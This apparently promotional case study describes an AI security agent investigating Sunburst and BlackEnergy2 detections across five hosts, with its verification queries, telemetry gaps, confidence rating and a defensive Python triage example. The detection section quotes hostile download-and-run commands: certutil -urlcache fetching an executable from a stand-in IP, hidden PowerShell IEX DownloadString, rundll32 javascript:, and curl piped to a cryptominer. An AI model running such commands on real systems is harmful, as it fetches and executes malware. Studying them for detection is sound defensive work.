Sunburst on five hosts.
Only one EDR saw it.
Five hosts across Windows and Linux are flagged with APT-grade malware: Sunburst (SolarWinds-era supply-chain tooling) and BlackEnergy2 (Sandworm / APT44). Three weeks of recurring detections. Three other EDR connectors saw nothing. Two telemetry connectors, process_activity and file_activity, returned zero records on the affected hosts. The agent’s verdict: Critical. Its confidence: Medium. The gap between those two ratings is the case.
The agent didn’t take Zircon’s word for it. It queried three other EDR connectors and two telemetry connectors. The cross-source view is what makes “Critical with Medium confidence” defensible.
Zero records on file_activity is a finding, not a non-result. The agent surfaces it, sets confidence accordingly, and recommends connector remediation as part of the response.
Verdict and confidence are separate dimensions. The verdict is Critical because the evidence supports it. The confidence is Medium because the verification chain has a documented break. The human reads both.
25 detections. One vendor saw all of them.
Phase 1 intake against the detection_finding mesh returned 25 high-severity records across five hosts. The malware family names matched two distinct lineages: Sunburst, associated with the SolarWinds supply-chain compromise, and BlackEnergy2, attributed to Sandworm / APT44, a nation-state actor known for destructive intrusions.
Hash 31b50e5fbf4b123b6f32fc28edd0ba86 (Sunburst) appeared in six distinct persistence locations spanning Windows Tasks, Windows Startup folders, Linux /usr/bin/, Linux /etc/cron.hourly/, Windows Prefetch, and a user Desktop directory. All between March 24 and April 12. One hash, one binary, redeployed or self-propagating across the cluster.
| Host | OS | User | Family | Path |
|---|---|---|---|---|
| LAP-812 | Windows | deborah.w*** | Sunburst | C:\Windows\Tasks\WinX.Sunburst.zip |
| WORKSTATION-272 | Windows | christopher.t*** | BlackEnergy2 | C:\Program Files (x86)\BlackEnergy2.zip |
| VIRTSRV-804 | Windows / VM | edward.b*** | Sunburst | Startup folder |
| suse-mlops-1126 | Linux / SUSE | peter.t*** | BlackEnergy2 + cryptominer | Webserver-served payload |
| ubuntu-appdev-1846 | Linux / Ubuntu | dawn.c*** | BlackEnergy2 | crontab persistence |
The delivery methods are textbook LOLBin: outlook.exe → powershell.exe → certutil -urlcache on the laptop; excel.exe → cmd.exe → powershell.exe -nop -noni -w hidden -c IEX (DownloadString) on the workstation; scrcons.exe → rundll32 javascript: on the VM; bash → curl with cryptominer pipe on the SUSE host. Five different initial-access patterns, one campaign.
Three other EDR connectors had nothing.
Before promoting the verdict, the agent ran cross-source detection verification: same malware, same hosts, same 90-day window, queried across every other available EDR and detection connector.
ATB-MDE produced detections for Crilock and PSAttackTool on different hosts, all RESOLVED. Two other production EDRs, Carbonblack and CrowdStrike, produced zero HIGH+ findings in the same 90-day window. If Zircon misses a variant, no backup detection exists. Single-source detection is a process risk the agent surfaces explicitly.
Confidence in malware family attribution: High. Confidence in environmental scope: Medium. Zircon’s coverage map may not match Carbonblack’s or CrowdStrike’s. Other hosts may be infected and invisible to the EDR that’s looking.
Detection without execution evidence.
The detection record contains a command line: certutil.exe -urlcache -split -f http://192.0.2.45/svc01da4def.exe.
Convincing on its face. But the command line lives inside the detection event itself; it was reported by Zircon’s parser, not corroborated by an independent process tree. Standard verification requires pulling process_activity and file_activity for the affected hosts and matching execution timestamps to detection timestamps.
The agent ran exactly that verification, and got nothing.
Zero file_activity records. Zero process_activity records. Across six telemetry connectors. Each query independently confirmed: the affected hosts either don’t forward EDR telemetry, or the connectors that should cover them don’t.
The agent’s confidence was set to Medium specifically because of this gap. The detection is real; the family attribution is supported by VirusTotal confirmation on the hashes; the execution chain cannot be independently verified. The report’s exact language: “Detection-only evidence; zero telemetry corroboration.”
Cross-source detection coverage is a hygiene metric.
One EDR seeing 25 detections while three others see zero is information. It does not invalidate the finding. Zircon’s verdict is well-supported by hash reputation. But it means the environmental scope claim is bounded by Zircon’s coverage map, which may not match what the rest of the stack sees.
Telemetry gaps are not silent.
file_activity and process_activity returning zero records is the loudest possible signal that something is wrong with the detection-to-telemetry coupling. The agent names the gap, sets confidence accordingly, and recommends investigating connector health before any cleanup action.
Confidence ≠ verdict.
Verdict: Malicious. Confidence: Medium. Both are stated. The verdict is supported by external hash reputation and consistent persistence patterns. The confidence is bounded by the inability to verify execution independently. Most autonomous tools collapse these into one number. Workers keeps them separate.
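The three points above (single-source coverage, telemetry gaps as a signal, verdict kept separate from confidence) as an added worked example, not code from this page or from the product it describes: a small triage function that derives the verdict from external hash reputation, lowers confidence for each documented break in the verification chain, and records the gaps by name. The connector names and sample records are constructed from the case above, and the BlackEnergy2 hash is a placeholder.

```python
from dataclasses import dataclass, field

@dataclass
class Assessment:
    verdict: str      # what the evidence supports
    confidence: str   # how intact the verification chain is
    gaps: list = field(default_factory=list)

def assess(detections, telemetry, reputation):
    # detections: {connector: [(host, family, hash), ...]}; telemetry: {connector: {host, ...}}
    # reputation: {hash: "Known Malicious" | ...} from external enrichment (e.g. VirusTotal)
    hits = {c: recs for c, recs in detections.items() if recs}
    if not hits:
        return Assessment("No finding", "High")
    hosts = {h for recs in hits.values() for h, _, _ in recs}
    hashes = {x for recs in hits.values() for _, _, x in recs}
    external = {x for x in hashes if reputation.get(x) == "Known Malicious"}
    # The verdict is driven by the evidence, not by how many connectors fired.
    verdict = "Malicious" if external else "Suspicious"
    gaps = []
    if len(hits) == 1:
        (only,) = hits
        silent = sorted(c for c in detections if c != only)
        gaps.append(f"single-source detection: only {only} fired; "
                    f"{', '.join(silent)} returned 0 records")
    # Zero telemetry on the affected hosts is a finding, not a non-result.
    seen = {h for hs in telemetry.values() for h in hs}
    dark = sorted(hosts - seen)
    if dark:
        gaps.append(f"telemetry gap: 0 process/file records for {', '.join(dark)} "
                    f"across {len(telemetry)} connectors")
    # Each documented break in the verification chain lowers confidence.
    if not dark:
        confidence = "High"
    elif external:
        confidence = "Medium"  # detection-only evidence, hashes confirmed externally
    else:
        confidence = "Low"
    return Assessment(verdict, confidence, gaps)

# Constructed sample modelled on the case above; the BlackEnergy2 hash is a placeholder.
SAMPLE_DETECTIONS = {
    "detection.zircon_v2": [
        ("LAP-812", "Sunburst", "31b50e5fbf4b123b6f32fc28edd0ba86"),
        ("ubuntu-appdev-1846", "BlackEnergy2", "BLACKENERGY2-HASH-PLACEHOLDER"),
    ],
    "detection.carbonblack": [],
    "detection.crowdstrike": [],
}
SAMPLE_TELEMETRY = {"process_activity.cbc": set(), "file_activity.cbc": set()}
SAMPLE_REPUTATION = {h: "Known Malicious" for _, _, h in SAMPLE_DETECTIONS["detection.zircon_v2"]}
```

Running `assess(SAMPLE_DETECTIONS, SAMPLE_TELEMETRY, SAMPLE_REPUTATION)` reproduces the case: verdict Malicious, confidence Medium, two named gaps.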
Standard tier budgets are a feature.
The investigation hit the 15-query budget at Standard tier. Rather than overrunning, it documented what was deferred (auth, network egress, full forensics) and recommended Deep tier upgrade with the specific queries that would extend coverage. Budget exhaustion is a decision point, not a failure.
Cross-source verification queries
| Query | Purpose | Result |
|---|---|---|
| Q1 | Phase 1 intake: HIGH+ detection across mesh | 25 DETECTIONS |
| Q3 | Carbonblack cross-check: same hosts, same window | 0 RECORDS |
| Q4 | CrowdStrike cross-check | 0 RECORDS |
| Q5 | file_activity telemetry pivot: does any source see execution? | TELEMETRY GAP |
| Q6 | process_activity pivot: same five hosts | TELEMETRY GAP |
| Q7 | Sunburst hash persistence across 3 weeks: /usr/bin/, /etc/cron.hourly/, user Desktop. March 24 to April 12. | 6 LOCATIONS |
| Q14–Q15 | VirusTotal hash enrichment | EXTERNAL CONFIRM |
Showing 7 of 15 queries (budget reached at Standard tier). Full audit trail in queries.md.
Sources queried · with status
| Source | Status | Notes |
|---|---|---|
| detection.zircon_v2 | HIT | 25 detections across 5 hosts. Sole detection source. |
| detection.carbonblack | EMPTY | 0 HIGH+ records, same 90d window. No corroboration. |
| detection.crowdstrike | EMPTY | 0 HIGH+ records, same 90d window. No corroboration. |
| detection.atb_mde (Defender) | DIFFERENT FAMILIES | Crilock + PSAttackTool, all RESOLVED. Different surface, different families. |
| file_activity (ATB-XDR, CBC, Kalibr) | GAP | 0 records across 6 telemetry connectors for the 5 affected hosts. |
| process_activity (ATB-XDR, CBC, Kalibr) | GAP | 0 records. Independent execution verification impossible. |
| osint.virustotal | HIT | Both campaign hashes confirmed Known Malicious externally. |
Gaps explicitly catalogued
- Single-source detection coverage: if Zircon misses a variant, no other EDR provides backup. This is a process risk, not a finding closure.
- Zero telemetry corroboration: file_activity + process_activity empty across all telemetry connectors for the 5 hosts. Execution timelines depend on Zircon’s parser.
- Cannot confirm remediation efficacy: if any cleanup actions were taken, no telemetry trail shows the outcome.
- Authentication for affected users not pulled. Budget-bound. Lateral movement and credential reuse from these 5 hosts is unverified.
- Network egress detail for C2 IPs deferred. Standard tier budget exhausted at 15 queries. Recommend Deep tier upgrade for full scope.
Cross-check your top alerts against every connector.
Bring an alert. See what every other source saw.
